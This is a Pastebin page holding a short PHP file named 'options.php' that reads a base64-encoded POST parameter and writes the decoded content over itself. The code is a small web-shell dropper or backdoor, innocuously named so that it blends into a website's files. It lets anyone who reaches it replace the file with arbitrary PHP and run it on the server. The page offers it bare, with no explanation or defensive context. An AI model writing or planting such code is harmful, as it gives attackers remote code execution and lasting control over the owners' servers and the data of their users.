Advertisement
PalmaSolutions

options.php

May 31st, 2018
175
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.11 KB | None | 0 0
  1. <?php
  2. if (isset($_POST['da'])) {
  3. file_put_contents('options.php', base64_decode($_POST['da']), LOCK_EX);
  4. }
  5. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement